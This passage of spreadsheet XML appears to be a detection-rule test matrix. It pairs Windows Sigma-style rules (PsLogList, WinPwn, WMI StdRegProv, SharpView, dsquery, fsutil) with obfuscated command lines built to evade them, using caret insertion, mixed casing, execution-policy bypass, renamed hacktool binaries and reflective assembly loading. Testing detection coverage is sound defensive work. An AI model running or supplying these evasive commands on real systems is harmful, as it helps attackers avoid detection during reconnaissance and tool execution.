        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C396" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D396" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E396" s="36" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" -"c" "powershell -nop -wINDoWsTYle Hidden -"Command" \" &amp;{Start-Process -"FilePath" 'C:\Windows\Sysinternals\psloglist64.exe' /"ArgumentList" "-x'" , 'application' }\""</t>
        </is>
      </c>
      <c r="F396" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G396" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H396" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I396" s="43" t="n"/>
      <c r="J396" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K396" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="397" ht="15.75" customHeight="1" s="42">
      <c r="A397" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B397" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C397" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D397" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E397" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F397" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G397" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H397" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I397" s="43" t="n"/>
      <c r="J397" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K397" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="398" ht="15.75" customHeight="1" s="42">
      <c r="A398" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B398" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C398" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D398" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E398" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F398" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G398" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H398" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I398" s="43" t="n"/>
      <c r="J398" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K398" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="399" ht="15.75" customHeight="1" s="42">
      <c r="A399" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B399" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C399" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D399" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E399" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F399" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G399" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H399" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I399" s="43" t="n"/>
      <c r="J399" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K399" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="400" ht="15.75" customHeight="1" s="42">
      <c r="A400" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B400" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C400" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D400" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E400" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F400" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G400" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H400" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I400" s="36" t="n"/>
      <c r="J400" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K400" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="401" ht="15.75" customHeight="1" s="42">
      <c r="A401" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B401" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C401" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D401" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E401" s="43" t="inlineStr">
        <is>
          <t>powershell -Nop -"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F401" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G401" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H401" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I401" s="43" t="n"/>
      <c r="J401" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K401" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="402" ht="15.75" customHeight="1" s="42">
      <c r="A402" s="36" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B402" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C402" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D402" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E402" s="43" t="inlineStr">
        <is>
          <t>powershell /"nop" -"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F402" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G402" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H402" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I402" s="43" t="n"/>
      <c r="J402" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K402" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="403" ht="15.75" customHeight="1" s="42">
      <c r="A403" s="36" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B403" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C403" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D403" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E403" s="36" t="inlineStr">
        <is>
          <t>powershell -NoProfile /"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F403" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G403" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H403" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I403" s="43" t="n"/>
      <c r="J403" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K403" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="404" ht="15.75" customHeight="1" s="42">
      <c r="A404" s="36" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B404" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C404" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D404" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E404" s="36" t="inlineStr">
        <is>
          <t>powershell -"nop" /"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F404" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G404" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H404" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I404" s="43" t="n"/>
      <c r="J404" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K404" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="405" ht="15.75" customHeight="1" s="42">
      <c r="A405" s="36" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B405" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C405" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D405" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E405" s="36" t="inlineStr">
        <is>
          <t>powershell -"nop" -"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F405" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G405" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H405" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I405" s="43" t="n"/>
      <c r="J405" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K405" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="406" ht="15.75" customHeight="1" s="42">
      <c r="A406" s="43" t="inlineStr">
        <is>
          <t>t1120</t>
        </is>
      </c>
      <c r="B406" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_drive_enumeration</t>
        </is>
      </c>
      <c r="C406" s="36" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration</t>
        </is>
      </c>
      <c r="D406" s="36" t="inlineStr">
        <is>
          <t>63de06b9-a385-40b5-8b32-73f2b9ef84b6</t>
        </is>
      </c>
      <c r="E406" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "fsutil fsinfo dri^ves"</t>
        </is>
      </c>
      <c r="F406" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G406" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H406" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I406" s="43" t="n"/>
      <c r="J406" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K406" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="407" ht="15.75" customHeight="1" s="42">
      <c r="A407" s="43" t="inlineStr">
        <is>
          <t>t1124</t>
        </is>
      </c>
      <c r="B407" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_time_discovery</t>
        </is>
      </c>
      <c r="C407" s="36" t="inlineStr">
        <is>
          <t>Discovery of a System Time</t>
        </is>
      </c>
      <c r="D407" s="36" t="inlineStr">
        <is>
          <t>b243b280-65fe-48df-ba07-6ddea7646427</t>
        </is>
      </c>
      <c r="E407" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "net.exe ti^me \\localhost"</t>
        </is>
      </c>
      <c r="F407" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G407" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H407" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I407" s="43" t="n"/>
      <c r="J407" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K407" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="408" ht="15.75" customHeight="1" s="42">
      <c r="A408" s="43" t="inlineStr">
        <is>
          <t>t1124</t>
        </is>
      </c>
      <c r="B408" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_time_discovery</t>
        </is>
      </c>
      <c r="C408" s="36" t="inlineStr">
        <is>
          <t>Discovery of a System Time</t>
        </is>
      </c>
      <c r="D408" s="36" t="inlineStr">
        <is>
          <t>b243b280-65fe-48df-ba07-6ddea7646427</t>
        </is>
      </c>
      <c r="E408" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "w32tm /t^z"</t>
        </is>
      </c>
      <c r="F408" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G408" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H408" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I408" s="43" t="n"/>
      <c r="J408" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K408" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="409" ht="15.75" customHeight="1" s="42">
      <c r="A409" s="43" t="n"/>
      <c r="B409" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C409" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D409" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E409" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F409" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G409" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H409" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I409" s="36" t="n"/>
      <c r="J409" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K409" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="410" ht="15.75" customHeight="1" s="42">
      <c r="A410" s="43" t="n"/>
      <c r="B410" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C410" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D410" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E410" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F410" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G410" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H410" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I410" s="43" t="n"/>
      <c r="J410" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K410" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="411" ht="15.75" customHeight="1" s="42">
      <c r="A411" s="43" t="n"/>
      <c r="B411" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C411" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D411" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E411" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop /"ExecutionPolicy" Bypass /"Command" "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F411" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G411" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H411" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I411" s="43" t="n"/>
      <c r="J411" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K411" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="412" ht="15.75" customHeight="1" s="42">
      <c r="A412" s="43" t="n"/>
      <c r="B412" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C412" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D412" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E412" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -EXeCutIONPOlIcY Bypass -c "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F412" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G412" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H412" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I412" s="36" t="n"/>
      <c r="J412" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K412" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="413" ht="15.75" customHeight="1" s="42">
      <c r="A413" s="43" t="n"/>
      <c r="B413" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C413" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D413" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E413" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -noPrOFilE -"ExecutionPolicy" Bypass -c "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F413" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G413" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H413" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I413" s="36" t="n"/>
      <c r="J413" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K413" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="414" ht="15.75" customHeight="1" s="42">
      <c r="A414" s="43" t="n"/>
      <c r="B414" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C414" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D414" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E414" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop /"ExecutionPolicy" Bypass -COmMaNd "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F414" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G414" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H414" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I414" s="43" t="n"/>
      <c r="J414" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K414" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="415" ht="15.75" customHeight="1" s="42">
      <c r="A415" s="43" t="n"/>
      <c r="B415" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advanced_ip_scanner</t>
        </is>
      </c>
      <c r="C415" s="36" t="inlineStr">
        <is>
          <t>PUA - Advanced IP Scanner Execution</t>
        </is>
      </c>
      <c r="D415" s="36" t="inlineStr">
        <is>
          <t>bef37fa2-f205-4a7b-b484-0759bfd5f86f</t>
        </is>
      </c>
      <c r="E415" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy C:\Tools\advanced_ip_scanner.exe C:\Temp\audit.exe &amp; C:\Temp\audit.exe"</t>
        </is>
      </c>
      <c r="F415" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G415" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H415" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I415" s="36" t="n"/>
      <c r="J415" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K415" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="416" ht="15.75" customHeight="1" s="42">
      <c r="A416" s="43" t="inlineStr">
        <is>
          <t>t1217</t>
        </is>
      </c>
      <c r="B416" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_dir_execution</t>
        </is>
      </c>
      <c r="C416" s="36" t="inlineStr">
        <is>
          <t>File And SubFolder Enumeration Via Dir Command</t>
        </is>
      </c>
      <c r="D416" s="36" t="inlineStr">
        <is>
          <t>7c9340a9-e2ee-4e43-94c5-c54ebbea1006</t>
        </is>
      </c>
      <c r="E416" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "for /R C:\ %i in (*) do @echo %i"</t>
        </is>
      </c>
      <c r="F416" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G416" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H416" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I416" s="36" t="n"/>
      <c r="J416" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K416" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="417" ht="15.75" customHeight="1" s="42">
      <c r="A417" s="43" t="inlineStr">
        <is>
          <t>t1217</t>
        </is>
      </c>
      <c r="B417" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_dir_execution</t>
        </is>
      </c>
      <c r="C417" s="36" t="inlineStr">
        <is>
          <t>File And SubFolder Enumeration Via Dir Command</t>
        </is>
      </c>
      <c r="D417" s="36" t="inlineStr">
        <is>
          <t>7c9340a9-e2ee-4e43-94c5-c54ebbea1006</t>
        </is>
      </c>
      <c r="E417" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "set d=di &amp;&amp; set r=r &amp;&amp; call %d%%r% /s"</t>
        </is>
      </c>
      <c r="F417" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G417" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H417" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I417" s="43" t="n"/>
      <c r="J417" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K417" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="418" ht="15.75" customHeight="1" s="42">
      <c r="A418" s="43" t="inlineStr">
        <is>
          <t>t1217</t>
        </is>
      </c>
      <c r="B418" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_dir_execution</t>
        </is>
      </c>
      <c r="C418" s="36" t="inlineStr">
        <is>
          <t>File And SubFolder Enumeration Via Dir Command</t>
        </is>
      </c>
      <c r="D418" s="36" t="inlineStr">
        <is>
          <t>7c9340a9-e2ee-4e43-94c5-c54ebbea1006</t>
        </is>
      </c>
      <c r="E418" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "tree C:\ /F"</t>
        </is>
      </c>
      <c r="F418" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G418" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H418" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I418" s="43" t="n"/>
      <c r="J418" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K418" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="419" ht="15.75" customHeight="1" s="42">
      <c r="A419" s="43" t="inlineStr">
        <is>
          <t>t1482</t>
        </is>
      </c>
      <c r="B419" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_dsquery_domain_trust_discovery</t>
        </is>
      </c>
      <c r="C419" s="36" t="inlineStr">
        <is>
          <t>Domain Trust Discovery Via Dsquery</t>
        </is>
      </c>
      <c r="D419" s="36" t="inlineStr">
        <is>
          <t>3bad990e-4848-4a78-9530-b427d854aac0</t>
        </is>
      </c>
      <c r="E419" s="36" t="inlineStr">
        <is>
          <t>dsquery * -filter "(objectClass=1.2.840.113556.1.5.43)" -attr *</t>
        </is>
      </c>
      <c r="F419" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G419" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H419" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I419" s="43" t="n"/>
      <c r="J419" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K419" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="420" ht="15.75" customHeight="1" s="42">
      <c r="A420" s="43" t="inlineStr">
        <is>
          <t>t1482</t>
        </is>
      </c>
      <c r="B420" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_dsquery_domain_trust_discovery</t>
        </is>
      </c>
      <c r="C420" s="36" t="inlineStr">
        <is>
          <t>Domain Trust Discovery Via Dsquery</t>
        </is>
      </c>
      <c r="D420" s="36" t="inlineStr">
        <is>
          <t>3bad990e-4848-4a78-9530-b427d854aac0</t>
        </is>
      </c>
      <c r="E420" s="36" t="inlineStr">
        <is>
          <t>dsquery * -filter "(objectClass=trusted""Domain)" -attr *</t>
        </is>
      </c>
      <c r="F420" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G420" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H420" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I420" s="43" t="n"/>
      <c r="J420" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K420" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="421" ht="15.75" customHeight="1" s="42">
      <c r="A421" s="43" t="n"/>
      <c r="B421" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C421" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D421" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E421" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy SharpView.exe sv_update.exe &amp; sv_update.exe G^et-Doma^inComputer"</t>
        </is>
      </c>
      <c r="F421" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G421" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H421" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I421" s="43" t="n"/>
      <c r="J421" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K421" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="422" ht="15.75" customHeight="1" s="42">
      <c r="A422" s="43" t="n"/>
      <c r="B422" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C422" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D422" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E422" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" /"ExecutionPolicy" Bypass -cOmmAND "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F422" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G422" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H422" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I422" s="36" t="n"/>
      <c r="J422" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K422" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="423" ht="15.75" customHeight="1" s="42">
      <c r="A423" s="43" t="n"/>
      <c r="B423" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C423" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D423" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E423" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop /"ExecutionPolicy" Bypass /"Command" "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F423" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G423" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H423" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I423" s="36" t="n"/>
      <c r="J423" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K423" s="36" t="b">
        <v>0</v>
      </c>
    </row>
